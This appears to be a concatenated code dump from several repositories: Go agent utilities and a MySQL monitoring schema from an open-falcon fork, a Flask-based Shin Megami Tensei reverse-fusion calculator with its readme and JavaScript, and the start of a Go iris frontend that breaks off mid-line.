= strings.ToUpper(s) i := strings.IndexFunc(s, unicode.IsLetter) if i == -1 { bytes, err := strconv.ParseFloat(s, 64) if err != nil || bytes <= 0 { return 0 } return uint64(bytes) } bytesString, multiple := s[:i], s[i:] bytes, err := strconv.ParseFloat(bytesString, 64) if err != nil || bytes <= 0 { return 0 } switch multiple { case "T", "TB", "TIB": return uint64(bytes * TERA) case "G", "GB", "GIB": return uint64(bytes * GIGA) case "M", "MB", "MIB": return uint64(bytes * MEGA) case "K", "KB", "KIB": return uint64(bytes * KILO) case "B": return uint64(bytes) default: return 0 } } func FromTime(aTime time.Time) UUID { var u UUID utcTime := aTime.In(time.UTC) t := uint64(utcTime.Unix()-timeBase)*10000000 + uint64(utcTime.Nanosecond()/100) u[0], u[1], u[2], u[3] = byte(t>>24), byte(t>>16), byte(t>>8), byte(t) u[4], u[5] = byte(t>>40), byte(t>>32) u[6], u[7] = byte(t>>56)&0x0F, byte(t>>48) clock := atomic.AddUint32(&clockSeq, 1) u[8] = byte(clock >> 8) u[9] = byte(clock) copy(u[10:], hardwareAddr) u[6] |= 0x10 // set version to 1 (time based uuid) u[8] &= 0x3F // clear variant u[8] |= 0x80 // set to IETF variant return u } func (u UUID) String() string { var offsets = [...]int{0, 2, 4, 6, 9, 11, 14, 16, 19, 21, 24, 26, 28, 30, 32, 34} const hexString = "0123456789abcdef" r := make([]byte, 36) for i, b := range u { r[offsets[i]] = hexString[b>>4] r[offsets[i]+1] = hexString[b&0xF] } r[8] = '-' r[13] = '-' r[18] = '-' r[23] = '-' return string(r) } func IBytes(s uint64) string { sizes := []string{"B", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB"} return humanateBytes(s, 1024, sizes) } func logn(n, b float64) float64 { return math.Log(n) / math.Log(b) } func humanateBytes(s uint64, base float64, sizes []string) string { if s < 10 { return fmt.Sprintf("%d B", s) } e := math.Floor(logn(float64(s), base)) suffix := sizes[int(e)] val := math.Floor(float64(s)/math.Pow(base, e)*10+0.5) / 10 f := "%.0f %s" if val < 10 { f = "%.1f %s" } return fmt.Sprintf(f, val, suffix) } func SendData(conn net.Conn, buffer []byte) (size int, err error) { w, err := conn.Write(buffer) if err != nil { return 0, fmt.Errorf("Error while writing: %s", err) } //log.Info("write data "+strconv.Itoa(w)) if w != len(buffer) { return w, fmt.Errorf("Error while writing size: %s", w) } return w, nil } func ReceiveData(conn net.Conn, buffersize uint64) error { b := make([]byte, buffersize) defer conn.Close() //var t int =0 for { w, err := conn.Read(b) if err != nil { if err.Error() == "EOF" { return nil } else { return fmt.Errorf("Read: %d, Error: %s in conn read ", w, err) } } //t=t+w; //if t < buffersize{ // continue //} if w == 16 { log.Info("reback uuid=======") m := make([]byte, 0) for i := 0; i < 16; i++ { m = append(m, b[i]) } w, err := conn.Write(m) if err != nil { return fmt.Errorf("Read: %d, Error: %s in seand uuid", w, err) } } } } <file_sep>/modules/agent/speedtest/server.go package speedtest // author liyc // 本期client的uuid不做验证,意义不大 //本期只支持client->server 模式 import ( log "github.com/Sirupsen/logrus" "github.com/open-falcon/falcon-plus/modules/agent/g" "net" "strconv" ) func Server() { port := ":" + strconv.Itoa(g.Config().Net_speed.Port) buffersize := unitToNumber(g.Config().Net_speed.BufLen) ln, err := net.Listen("tcp", port) if err != nil { log.Fatalf("Could not listen on %s: %s", port, err) } go func(l net.Listener) { defer l.Close() for { conn, err := l.Accept() if err != nil { log.Printf("Error accepting new bandwidth connection: %v", err) continue } log.Printf("Accepted connection from %s", conn.RemoteAddr()) go handleConnection(conn, buffersize) } }(ln) } func handleConnection(conn net.Conn, buffersize uint64) { err := ReceiveData(conn, buffersize) if err != nil { log.Printf("Error: %s", err) return } } <file_sep>/scripts/mysql/db_schema/db-one-schema.sql create database monitor DEFAULT CHARACTER SET utf8 DEFAULT COLLATE utf8_general_ci; USE monitor; SET NAMES utf8; /* ---------------------------------------------uic--------------------------------------*/ DROP TABLE if exists team; CREATE TABLE `team` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(64) NOT NULL, `resume` varchar(255) not null default '', `creator` int(10) unsigned NOT NULL DEFAULT '0', `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (`id`), UNIQUE KEY `idx_team_name` (`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /** * role: -1:blocked 0:normal 1:admin 2:root */ DROP TABLE if exists `user`; CREATE TABLE `user` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(64) NOT NULL, `passwd` varchar(64) not null default '', `cnname` varchar(128) not null default '', `email` varchar(255) not null default '', `phone` varchar(16) not null default '', `im` varchar(32) not null default '', `qq` varchar(16) not null default '', `role` tinyint not null default 0, `creator` int(10) unsigned NOT NULL DEFAULT 0, `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (`id`), UNIQUE KEY `idx_user_name` (`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; DROP TABLE if exists `rel_team_user`; CREATE TABLE `rel_team_user` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `tid` int(10) unsigned not null, `uid` int(10) unsigned not null, PRIMARY KEY (`id`), KEY `idx_rel_tid` (`tid`), KEY `idx_rel_uid` (`uid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; DROP TABLE if exists `session`; CREATE TABLE `session` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned not null, `sig` varchar(32) not null, `expired` int(10) unsigned not null, PRIMARY KEY (`id`), KEY `idx_session_uid` (`uid`), KEY `idx_session_sig` (`sig`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*900150983cd24fb0d6963f7d28e17f72*/ /*insert into `user`(`name`, `passwd`, `role`, `created`) values('root', md5('abc'), 2, now());*/ /*---------------------------------------------portal -----------------------------------------*/ /** * 这里的机器是从机器管理系统中同步过来的 * 系统拿出来单独部署需要为hbs增加功能,心跳上来的机器写入host表 */ DROP TABLE IF EXISTS host; CREATE TABLE host ( id INT UNSIGNED NOT NULL AUTO_INCREMENT, hostname VARCHAR(255) NOT NULL DEFAULT '', ip VARCHAR(16) NOT NULL DEFAULT '', agent_version VARCHAR(16) NOT NULL DEFAULT '', plugin_version VARCHAR(128) NOT NULL DEFAULT '', maintain_begin INT UNSIGNED NOT NULL DEFAULT 0, maintain_end INT UNSIGNED NOT NULL DEFAULT 0, update_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, PRIMARY KEY (id), UNIQUE KEY idx_host_hostname (hostname) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; /** * 机器分组信息 * come_from 0: 从机器管理同步过来的;1: 从页面创建的 */ DROP TABLE IF EXISTS grp; CREATE TABLE `grp` ( id INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, grp_name VARCHAR(255) NOT NULL DEFAULT '', create_user VARCHAR(64) NOT NULL DEFAULT '', create_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, come_from TINYINT(4) NOT NULL DEFAULT '0', PRIMARY KEY (id), UNIQUE KEY idx_host_grp_grp_name (grp_name) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; DROP TABLE IF EXISTS grp_host; CREATE TABLE grp_host ( grp_id INT UNSIGNED NOT NULL, host_id INT UNSIGNED NOT NULL, KEY idx_grp_host_grp_id (grp_id), KEY idx_grp_host_host_id (host_id) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; /** * 监控策略模板 * tpl_name全局唯一,命名的时候可以适当带上一些前缀,比如:sa.falcon.base */ DROP TABLE IF EXISTS tpl; CREATE TABLE tpl ( id INT UNSIGNED NOT NULL AUTO_INCREMENT, tpl_name VARCHAR(255) NOT NULL DEFAULT '', parent_id INT UNSIGNED NOT NULL DEFAULT 0, action_id INT UNSIGNED NOT NULL DEFAULT 0, create_user VARCHAR(64) NOT NULL DEFAULT '', create_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (id), UNIQUE KEY idx_tpl_name (tpl_name), KEY idx_tpl_create_user (create_user) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; DROP TABLE IF EXISTS strategy; CREATE TABLE `strategy` ( `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, `metric` VARCHAR(128) NOT NULL DEFAULT '', `tags` VARCHAR(256) NOT NULL DEFAULT '', `max_step` INT(11) NOT NULL DEFAULT '1', `priority` TINYINT(4) NOT NULL DEFAULT '0', `func` VARCHAR(16) NOT NULL DEFAULT 'all(#1)', `op` VARCHAR(8) NOT NULL DEFAULT '', `right_value` VARCHAR(64) NOT NULL, `note` VARCHAR(128) NOT NULL DEFAULT '', `run_begin` VARCHAR(16) NOT NULL DEFAULT '', `run_end` VARCHAR(16) NOT NULL DEFAULT '', `tpl_id` INT(10) UNSIGNED NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `idx_strategy_tpl_id` (`tpl_id`) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; DROP TABLE IF EXISTS expression; CREATE TABLE `expression` ( `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, `expression` VARCHAR(1024) NOT NULL, `func` VARCHAR(16) NOT NULL DEFAULT 'all(#1)', `op` VARCHAR(8) NOT NULL DEFAULT '', `right_value` VARCHAR(16) NOT NULL DEFAULT '', `max_step` INT(11) NOT NULL DEFAULT '1', `priority` TINYINT(4) NOT NULL DEFAULT '0', `note` VARCHAR(1024) NOT NULL DEFAULT '', `action_id` INT(10) UNSIGNED NOT NULL DEFAULT '0', `create_user` VARCHAR(64) NOT NULL DEFAULT '', `pause` TINYINT(1) NOT NULL DEFAULT '0', PRIMARY KEY (`id`) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; DROP TABLE IF EXISTS grp_tpl; CREATE TABLE `grp_tpl` ( `grp_id` INT(10) UNSIGNED NOT NULL, `tpl_id` INT(10) UNSIGNED NOT NULL, `bind_user` VARCHAR(64) NOT NULL DEFAULT '', KEY `idx_grp_tpl_grp_id` (`grp_id`), KEY `idx_grp_tpl_tpl_id` (`tpl_id`) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; CREATE TABLE `plugin_dir` ( `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, `grp_id` INT(10) UNSIGNED NOT NULL, `dir` VARCHAR(255) NOT NULL, `create_user` VARCHAR(64) NOT NULL DEFAULT '', `create_at` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (`id`), KEY `idx_plugin_dir_grp_id` (`grp_id`) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; DROP TABLE IF EXISTS action; CREATE TABLE `action` ( `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, `uic` VARCHAR(255) NOT NULL DEFAULT '', `url` VARCHAR(255) NOT NULL DEFAULT '', `callback` TINYINT(4) NOT NULL DEFAULT '0', `before_callback_sms` TINYINT(4) NOT NULL DEFAULT '0', `before_callback_mail` TINYINT(4) NOT NULL DEFAULT '0', `after_callback_sms` TINYINT(4) NOT NULL DEFAULT '0', `after_callback_mail` TINYINT(4) NOT NULL DEFAULT '0', PRIMARY KEY (`id`) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; /** * nodata mock config */ DROP TABLE IF EXISTS `mockcfg`; CREATE TABLE `mockcfg` ( `id` BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT, `name` VARCHAR(255) NOT NULL DEFAULT '' COMMENT 'name of mockcfg, used for uuid', `obj` VARCHAR(10240) NOT NULL DEFAULT '' COMMENT 'desc of object', `obj_type` VARCHAR(255) NOT NULL DEFAULT '' COMMENT 'type of object, host or group or other', `metric` VARCHAR(128) NOT NULL DEFAULT '', `tags` VARCHAR(1024) NOT NULL DEFAULT '', `dstype` VARCHAR(32) NOT NULL DEFAULT 'GAUGE', `step` INT(11) UNSIGNED NOT NULL DEFAULT 60, `mock` DOUBLE NOT NULL DEFAULT 0 COMMENT 'mocked value when nodata occurs', `creator` VARCHAR(64) NOT NULL DEFAULT '', `t_create` DATETIME NOT NULL COMMENT 'create time', `t_modify` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'last modify time', PRIMARY KEY (`id`), UNIQUE KEY `uniq_name` (`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; /** * aggregator cluster metric config table */ DROP TABLE IF EXISTS `cluster`; CREATE TABLE `cluster` ( `id` INT UNSIGNED NOT NULL AUTO_INCREMENT, `grp_id` INT NOT NULL, `numerator` VARCHAR(10240) NOT NULL, `denominator` VARCHAR(10240) NOT NULL, `endpoint` VARCHAR(255) NOT NULL, `metric` VARCHAR(255) NOT NULL, `tags` VARCHAR(255) NOT NULL, `ds_type` VARCHAR(255) NOT NULL, `step` INT NOT NULL, `last_update` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `creator` VARCHAR(255) NOT NULL, PRIMARY KEY (`id`) ) ENGINE =InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; /** * alert links */ DROP TABLE IF EXISTS alert_link; CREATE TABLE alert_link ( id INT UNSIGNED NOT NULL AUTO_INCREMENT, path VARCHAR(16) NOT NULL DEFAULT '', content TEXT NOT NULL, create_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (id), UNIQUE KEY alert_path(path) ) ENGINE =InnoDB DEFAULT CHARSET =utf8 COLLATE =utf8_unicode_ci; /* ------------------------------------dashboard---------------------------------- */ DROP TABLE IF EXISTS `dashboard_graph`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dashboard_graph` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `title` char(128) NOT NULL, `hosts` varchar(10240) NOT NULL DEFAULT '', `counters` varchar(1024) NOT NULL DEFAULT '', `screen_id` int(11) unsigned NOT NULL, `timespan` int(11) unsigned NOT NULL DEFAULT '3600', `graph_type` char(2) NOT NULL DEFAULT 'h', `method` char(8) DEFAULT '', `position` int(11) unsigned NOT NULL DEFAULT '0', `falcon_tags` varchar(512) NOT NULL DEFAULT '', PRIMARY KEY (`id`), KEY `idx_sid` (`screen_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Table structure for table `dashboard_screen` -- DROP TABLE IF EXISTS `dashboard_screen`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dashboard_screen` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `pid` int(11) unsigned NOT NULL DEFAULT '0', `name` char(128) NOT NULL, `time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, PRIMARY KEY (`id`), KEY `idx_pid` (`pid`), UNIQUE KEY `idx_pid_n` (`pid`,`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Table structure for table `tmp_graph` -- DROP TABLE IF EXISTS `tmp_graph`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `tmp_graph` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `endpoints` varchar(10240) NOT NULL DEFAULT '', `counters` varchar(10240) NOT NULL DEFAULT '', `ck` varchar(32) NOT NULL, `time_` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (`id`), UNIQUE KEY `idx_ck` (`ck`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; /*-----------------------------------------------graph---------------------------------------*/ DROP TABLE if exists `endpoint`; CREATE TABLE `endpoint` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `endpoint` varchar(255) NOT NULL DEFAULT '', `ts` int(11) DEFAULT NULL, `t_create` DATETIME NOT NULL COMMENT 'create time', `t_modify` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'last modify time', PRIMARY KEY (`id`), UNIQUE KEY `idx_endpoint` (`endpoint`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; DROP TABLE if exists `endpoint_counter`; CREATE TABLE `endpoint_counter` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `endpoint_id` int(10) unsigned NOT NULL, `counter` varchar(255) NOT NULL DEFAULT '', `step` int(11) not null default 60 comment 'in second', `type` varchar(16) not null comment 'GAUGE|COUNTER|DERIVE', `ts` int(11) DEFAULT NULL, `t_create` DATETIME NOT NULL COMMENT 'create time', `t_modify` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'last modify time', PRIMARY KEY (`id`), UNIQUE KEY `idx_endpoint_id_counter` (`endpoint_id`, `counter`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; DROP TABLE if exists `tag_endpoint`; CREATE TABLE `tag_endpoint` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `tag` varchar(255) NOT NULL DEFAULT '' COMMENT 'srv=tv', `endpoint_id` int(10) unsigned NOT NULL, `ts` int(11) DEFAULT NULL, `t_create` DATETIME NOT NULL COMMENT 'create time', `t_modify` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'last modify time', PRIMARY KEY (`id`), UNIQUE KEY `idx_tag_endpoint_id` (`tag`, `endpoint_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /* --------------------------------------------------alarms------------------------------------------*/ /* * 建立告警归档资料表, 主要存储各个告警的最后触发状况 */ DROP TABLE IF EXISTS event_cases; CREATE TABLE IF NOT EXISTS event_cases( id VARCHAR(50), endpoint VARCHAR(100) NOT NULL, metric VARCHAR(200) NOT NULL, func VARCHAR(50), cond VARCHAR(200) NOT NULL, note VARCHAR(500), max_step int(10) unsigned, current_step int(10) unsigned, priority INT(6) NOT NULL, status VARCHAR(20) NOT NULL, timestamp Timestamp NOT NULL, update_at Timestamp NULL DEFAULT NULL, closed_at Timestamp NULL DEFAULT NULL, closed_note VARCHAR(250), user_modified int(10) unsigned, tpl_creator VARCHAR(64), expression_id int(10) unsigned, strategy_id int(10) unsigned, template_id int(10) unsigned, process_note MEDIUMINT, process_status VARCHAR(20) DEFAULT 'unresolved', PRIMARY KEY (id), INDEX (endpoint, strategy_id, template_id) ) ENGINE =InnoDB DEFAULT CHARSET =utf8; /* * 建立告警归档资料表, 存储各个告警触发状况的历史状态 */ DROP TABLE IF EXISTS events; CREATE TABLE IF NOT EXISTS events ( id int(10) NOT NULL AUTO_INCREMENT, event_caseId VARCHAR(50), step int(10) unsigned, cond VARCHAR(200) NOT NULL, status int(3) unsigned DEFAULT 0, timestamp Timestamp, PRIMARY KEY (id), INDEX(event_caseId), FOREIGN KEY (event_caseId) REFERENCES event_cases(id) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE =InnoDB DEFAULT CHARSET =utf8; /* * 告警留言表 */ CREATE TABLE IF NOT EXISTS event_note ( id MEDIUMINT NOT NULL AUTO_INCREMENT, event_caseId VARCHAR(50), note VARCHAR(300), case_id VARCHAR(20), status VARCHAR(15), timestamp Timestamp, user_id int(10) unsigned, PRIMARY KEY (id), INDEX (event_caseId), FOREIGN KEY (event_caseId) REFERENCES event_cases(id) ON DELETE CASCADE ON UPDATE CASCADE, FOREIGN KEY (user_id) REFERENCES user(id) ON DELETE CASCADE ON UPDATE CASCADE );
0e2d476943c15fa72d392c9dc5a4587666b47119
[ "SQL", "Go", "Shell" ]
7
Go
liyongcun/falcon-plus
f5f2a95bb34ce5675bebde43f820a1fc8d539e23
8c947418507c9ee075709eb1147f1b055884e1fe
refs/heads/master
<repo_name>cleartonic/smt4a_calc<file_sep>/requirements.txt click==6.7 colorama==0.3.9 coloredlogs==10.0 Flask==1.0.2 Flask-WTF==0.14.2 humanfriendly==4.16.1 itsdangerous==0.24 Jinja2==2.10 MarkupSafe==1.0 numpy==1.15.1 pandas==0.23.4 pyreadline==2.1 python-dateutil==2.7.3 pytz==2018.5 six==1.11.0 Werkzeug==0.14.1 WTForms==2.2.1 xlrd==1.1.0<file_sep>/smt_flask.py import smt_calc as smt from flask import Flask, render_template, flash, request from flask_wtf import FlaskForm from wtforms import Form, TextField, TextAreaField, validators, StringField, SubmitField, SelectField, BooleanField, IntegerField application = Flask(__name__) application.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0 application.config.from_object(__name__) application.config['SECRET_KEY'] = '<KEY>' SKILL_LIST = [(skill,skill) for skill in smt.SKILL_RAW] DEMON_LIST = [(demon,demon) for demon in sorted(smt.DEMON_RAW)] class Profile: # Profile represents every time the user submits a form, what is entered def __init__(self, form_data): for key in form_data: setattr(self,key,form_data[key]) skill_list = list(set([self.skill1,self.skill2,self.skill3,self.skill4,self.skill5,self.skill6,self.skill7,self.skill8])) if len(skill_list) > 1 and '' in skill_list: skill_list.remove('') self.skill_list = skill_list demon_filter_list = list(set([self.filter_demon1,self.filter_demon2,self.filter_demon3,self.filter_demon4])) if len(demon_filter_list) > 1 and '' in demon_filter_list: demon_filter_list.remove('') self.demon_filter_list = demon_filter_list class SkillForm(FlaskForm): skill1 = SelectField(label='Skill', choices=SKILL_LIST) skill2 = SelectField(label='Skill', choices=SKILL_LIST) skill3 = SelectField(label='Skill', choices=SKILL_LIST) skill4 = SelectField(label='Skill', choices=SKILL_LIST) skill5 = SelectField(label='Skill', choices=SKILL_LIST) skill6 = SelectField(label='Skill', choices=SKILL_LIST) skill7 = SelectField(label='Skill', choices=SKILL_LIST) skill8 = SelectField(label='Skill', choices=SKILL_LIST) filter_demon1 = SelectField(label='Filter demons:', choices=DEMON_LIST) filter_demon2 = SelectField(label='Filter demons:', choices=DEMON_LIST) filter_demon3 = SelectField(label='Filter demons:', choices=DEMON_LIST) filter_demon4 = SelectField(label='Filter demons:', choices=DEMON_LIST) target_demon = SelectField(label='Target demon:', choices=DEMON_LIST) skill_match_only = BooleanField(label='Strict skill match only:',default=True) strict_filter = BooleanField(label='Strict filtering on all input filter demons:') fusion_level = IntegerField(label='Max Fusion Level (blank defaults to target demon level)') max_trees = IntegerField(label='Max trees',default=10) max_tree_results = IntegerField(label='Max tree results',default=10) max_only = BooleanField(label='Highest scoring output only:',default=True) @application.route("/", methods=['GET', 'POST']) def hello(): form = SkillForm() #if form.validate(): if request.method=='POST': p = Profile(form.data) rc = smt.ResultCluster(p.target_demon, p.skill_list, p.fusion_level,p.skill_match_only,p.max_only,p.demon_filter_list,p.strict_filter) rc.generate_results() # Take score_dict, which is in: { OVERALL SCORE : [list of skill/recruit/demon] } format # And convert to: # { OVERALL SCORE : ( [list of skill/recruit/demon], [RT_LIST] ) } # The reason for the original OVERALL SCORE is to have the ordering of the magnitude (highest scores first) # out if rc.result_failure: return render_template('index.html',form=form) else: output_scores = rc.find_matching_scores() output_scores = {k: v for k, v in output_scores.items() if k < p.max_trees } total_results = rc.total_results total_filtered_results = rc.total_filtered_results del(rc) return render_template('index.html', total_results=total_results, total_filtered_results=total_filtered_results,form=form, output_scores = output_scores, max_trees = p.max_trees, max_tree_results = p.max_tree_results) else: return render_template('index.html',form=form) @application.context_processor def utility_functions(): def print_in_console(message): print(str(message)) return dict(mdebug=print_in_console) if __name__ == "__main__": application.jinja_env.cache = {} application.run(debug=True)<file_sep>/readme.md # SMT Reverse Fusion Calculator #### A tool to help identify target demons by dynamically searching for fusions based on matching skills, recruitability, and demon number. #### <a href="http://smt.cleartonic.net" target="_blank">Link to browser interface</a> ### Current version: - Supports SMT4: Apocalypse (English) ### Next versions: - Implement 3/4 fusion requirement demons (functional as of now, but generates too many combinations which crashes the program. Need to smart filter somehow) - Support demon information/graphics in the interface, such as recruit locations, levels, etc. ![image](diagram.png?raw=true "image") ### Premise: Input a target demon (what you're attempting to fuse), and what skills you'd like. The calculator will generate all possible combinations '2 levels down', meaning all combinations that directly create the target demon, then all combinations that create each one of those combinations. This is referred to as a "result tree", just one of the many possible paths to create the final demon. All final result trees are scored on three criteria, in the following priority order: - Skills: higher score for most matching skills relative to the query - Recruitable: higher score for % of demons able to be recruited rather than fused - Demon: # of demons in the fusion The output will sort these results their scores above. Each row shows the first combination down, then clicking on the row expands to all the combinations with the fusion demons and their skills. (note: The "(R)" indicates that the demon is recruitable) For a basic, fast example, try searching Target demon "Pele", and uncheck "highest scoring output". This will return all combinations of Pele. Then try filtering for the skill "Mudo" and run again. Then select "highest scoring output", and naturally only the highest score (100/100/3 for skill/recruit/demon) will be shown. This program can be computationally intensive at times - some demons have an incredible amount of combinations (for example, a mid-50s demon such as "Illuyanka" has over 2 million ways to be created with the above '2 levels down' system.) ### Calculator arguments: #### Target demon - The final desired demon Skill - Up to 8 skills can be added. Each result tree will be scored individually based on whether or not the skills appear in the tree. - Setting the "Strict skill match only" flag will require all skills selected to be present in the tree, otherwise it is rejected from the output - Not setting the "Strict skill match only" flag will score all result trees based on how many of the desired skills appear in the result tree. For example, if the desired skills are "Hama", "Mudo", and "Dia", and a result tree's demons only have "Hama" and "Dia", the score will be 66% #### Filter demons - Up to 4 demons can be added. These will allow for filtering the results - Setting the 'strict filtering on all input filter demons" flag requires all filter demons to be present in the result tree - Not setting the 'strict filtering on all input filter demons" flag, but setting any number (1-4) of filtered demons, will show only result trees where at least 1 of the demons is present #### Max fusion level - This is the fusion level of the player character, which limits which fusions are available. - Default fusion level is set to the target demon, if none is entered. - Fusion level 99 assumes all fusions are available - Fusions are assumed to be limited to the max of all demons in the fusion. Theoretically, the player could grind demons past their fusion limit, but this system doesn't accommodate this, and assumes the player can recruit/make demons up to their fusion level. If this is a problem, just manually increase the fusion limit. #### Max trees - The number of trees to display. Each tree represents the first level down to make the target demon, at a specific score (based on the whole tree's fusions). Note that if the 'highest scoring output only' flag is set, only the top scoring trees will appear, which will drastically decrease the number of trees (and also speed up processing). #### Max tree results - The number of results in the expanded view for every result tree. When you click on the results bar for a given result tree, how many entries appear. This is set to 10, because most result trees can have a huge amount. This can be set to any number as the limit, but generation may take longer. Further, use filter demons if looking for a specific demon among the trees. #### Flags: - "Strict skill matching only" and "Strict filtering on all input demons" mentioned above - "Highest scoring output only" will output the result trees with the highest score (score = skills, recruitable and demon, prioritized in that order) ### Special Thanks - Thanks to [Caerulius](https://twitter.com/Caerulius) for helping with javascript to support the website's viewability - Inspiration & data from the impressive tools at [https://aqiu384.github.io/megaten-fusion-tool/home](https://aqiu384.github.io/megaten-fusion-tool/home)<file_sep>/static/js3.js $(document).ready(function(){ var hidden_output = 1 $(document).off().on('click','.resulttree',function() { console.log('Click'); var query = $(this).children('.output'); var isVisible = query.is(':visible'); if (isVisible === true) { query.hide(); } else { query.show(); } }); $(document).on('click','.hideoutput',function() { console.log('Hide/show all'); if (hidden_output == 0){ console.log('Call hide'); $('.resulttree').children('.output').hide() hidden_output = 1 } else { console.log('Call show'); $('.resulttree').children('.output').show() hidden_output = 0 } }); $('.resulttree').children('.output').hide(); })
b9cab361a2cf4d2c64c4cb29a3388232f85ff838
[ "Markdown", "Python", "Text", "JavaScript" ]
4
Text
cleartonic/smt4a_calc
eed11736b06d4a9cfed8809c40e271cd86dfd9b2
b60fa415432c40960f619e96501bf497d31dc5fa
refs/heads/master
<file_sep>package main import ( "encoding/json" "flag" "fmt" "net" "strconv" "time" "github.com/kataras/iris" "github.com/kataras/iris/middleware/logger" "github.com/kataras/iris/middleware/recover" ) //Data structure for the data type Homework struct { Name string Desc string Submissions int } type FrontendMessage struct { Operation string ID int NewHomework Homework } type BackendMessage struct { Success bool Homeworks []HomeworkStore ErrMessage string Homework Homework } type HomeworkStore struct { Homework Homework Deleted bool } var backend = "" /* The main loop of the program Input: none Output: none */ func main() { //Set flags portNumPtr := flag.Int("listen", 8080, "The port number the server will listen at") backendPtr := flag.String("backend", "localhost:8090", "The address of the backend server") flag.Parse() //Parse any command-line arguments port := *portNumPtr backend = *backendPtr //Initialize the server app := iris.New() app.Use(recover.New()) app.Use(logger.New()) //Set up handle app.Handle("GET", "/", handleHome) app.Get("/edit", handleEdit) app.Get("/edit_form", handleEditForm) app.Get("/create", handleCreate) app.Get("/create_form", handleCreateForm) app.Get("/delete", handleDelete) go ping() //Run the server app.Run(iris.Addr(":" + strconv.Itoa(port))) } /* This function keeps pinging the backend server and report a failure if it does not get a response Input: none Output: none */ func ping() { //Pingack for { response := sendToBackend(FrontendMessage{Operation: "ping"}) if !response.Success { fmt.Println("Detected failure on " + backend + " at " 